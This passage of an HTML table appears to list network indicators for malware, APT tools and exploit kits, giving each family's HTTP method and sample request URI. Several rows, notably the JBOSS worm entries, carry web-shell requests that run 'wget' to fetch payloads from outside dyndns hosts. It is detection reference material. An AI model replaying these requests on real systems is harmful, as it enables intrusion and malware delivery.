<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME EK"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME EK</span></td><td data-sheets-value="[null,2,"EK Blackhole 1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Blackhole 1</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/showthread.php?t=d7ad916d1c0396ff"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/showthread.php?t=d7ad916d1c0396ff</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME EK"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME EK</span></td><td data-sheets-value="[null,2,"EK Phoenix"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Phoenix</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/navigator/jueoaritjuir.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/navigator/jueoaritjuir.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Enfal / Lurid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Enfal / Lurid</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/oi2c/wlc3/ [redacted]:00-00-00-00-00-00/ij83d"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/oi2c/wlc3/ [redacted]:00-00-00-00-00-00/ij83d</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Enfal / Lurid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Enfal / Lurid</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/trandocs/nm/.[redacted] :00-00-00-00-00-00lCrrrwhite"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/trandocs/nm/.[redacted] :00-00-00-00-00-00lCrrrwhite</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Enfal / Lurid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Enfal / Lurid</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/cgi-bin/CMS_SubitAll.cgi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cgi-bin/CMS_SubitAll.cgi</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Enfal / Lurid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Enfal / Lurid</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/cgl-bin/Owpq4.cgi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cgl-bin/Owpq4.cgi</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Enfal / Lurid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Enfal / Lurid</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/Sjwpc/odw3ux"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Sjwpc/odw3ux</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Flashback OSX"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Flashback OSX</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/statistics.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/statistics.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Foxy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Foxy</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/404error.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/404error.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Foxy Checkin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Foxy Checkin</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/images/leftnav_prog_bg.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/images/leftnav_prog_bg.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st ASP ver"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gh0st ASP ver</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1/v2/1oginv2.asp?hi2wsdf351&x.\u2019..[xf)..<.3XqHr....)IL{..&y192.168.0.69"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..&lt;.3XqHr....)IL{..&y192.168.0.69</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st PHP ver"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Gh0st PHP ver</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st v2000 var"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Gh0st v2000 var</span></td><td data-sheets-value="[null,2,"n"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">n</span></td><td data-sheets-value="[null,2,"v2010........f...............(\n......Service Pack 2..?..|...|...|0.@.."]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">v2010........f...............(<br />......Service Pack 2..?..|...|...|0.@..</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"GoogleAdC2"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">GoogleAdC2</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/html/lost.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/html/lost.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"GoogleAdC2 2nd stage"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">GoogleAdC2 2nd stage</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/Trojan2.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Trojan2.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Googles"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Googles</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/sll/monica.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/sll/monica.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Greencat"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Greencat</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/<HOSTNAME>/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/&lt;HOSTNAME&gt;/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gtalk"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Gtalk</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/facebook.png"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/facebook.png</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"Hacktivism"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Hacktivism</span></td><td data-sheets-value="[null,2,"HOIC DDoS"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">HOIC DDoS</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ HTTP/1.0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ HTTP/1.0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Imaut"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Imaut</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/setting.doc"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/setting.doc</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"IRCbot"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">IRCbot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/check_ver.php?version=1.09"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/check_ver.php?version=1.09</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"IXESHE"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">IXESHE</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/\nwTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/<br />wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"IXESHE AES"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">IXESHE AES</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=\n+LLQhpkZ9LOhGbgqvJghHci7M"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=<br />+LLQhpkZ9LOhGbgqvJghHci7M</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"JBOSS worm"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">JBOSS worm</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/zecmd/zecmd.jsp?comment=perl+lindb.pl"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/zecmd/zecmd.jsp?comment=perl+lindb.pl</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"JBOSS worm"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">JBOSS worm</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"JBOSS worm"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">JBOSS worm</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Letsgo / TabMsgSQL"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Letsgo / TabMsgSQL</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc\node%20=%20'IXLCGIXELZ'"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc<br />ode%20=%20'IXLCGIXELZ'</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Letsgo / TabMsgSQL"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Letsgo / TabMsgSQL</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20\n from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20<br /> from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Letsgo / TabMsgSQL"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Letsgo / TabMsgSQL</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20\n (mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20\n ('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54',\n '2011-06-08%2013:45:54','NMQVPTXFBH')"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20<br /> (mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20<br /> ('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54',<br /> '2011-06-08%2013:45:54','NMQVPTXFBH')</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Letsgo / TabMsgSQL downloader"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Letsgo / TabMsgSQL downloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/new/iistart.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/new/iistart.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Likseput"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Likseput</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Lingbo (?)"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Lingbo (?)</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM\n>QAxADYA%26 meta%3DMDAwMGhI\u00c6\u00d1uMDk %3D%26id%3Dlfdxfircvscxggb"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM<br />>QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Luckycat - WIMMIE"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Luckycat - WIMMIE</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/count/count.php?m=c&n=[HOSTNAME]_"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/count/count.php?m=c&n=[HOSTNAME]_</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Medfos"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Medfos</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww=="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww==</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"MiniASP"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">MiniASP</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/device_<decoded ID string>asp?device_t=<random 10 digits>&key=<random 8 lowercase letters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/device_&lt;decoded ID string&gt;asp?device_t=&lt;random 10 digits&gt;&amp;key=&lt;random 8 lowercase letters&gt;&amp;device_id=&lt;decoded ID string&gt;&amp;cv=&lt;random 17 lowercase letters&gt;</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"MiniASP"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">MiniASP</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/record.asp?device_t=<random 10 digits>&key=<random 8 lowercase letters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters>&result=<URLencoded result data>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/record.asp?device_t=&lt;random 10 digits&gt;&amp;key=&lt;random 8 lowercase letters&gt;&amp;device_id=&lt;decoded ID string&gt;&amp;cv=&lt;random 17 lowercase letters&gt;&amp;result=&lt;URLencoded result data&gt;</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Miniduke"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Miniduke</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Mirage"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Mirage</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Mirage - later var"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Mirage - later var</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Money loader"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Money loader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/get_xml?file_id=25227372\n/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/get_xml?file_id=25227372<br />/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536</span></td></tr>
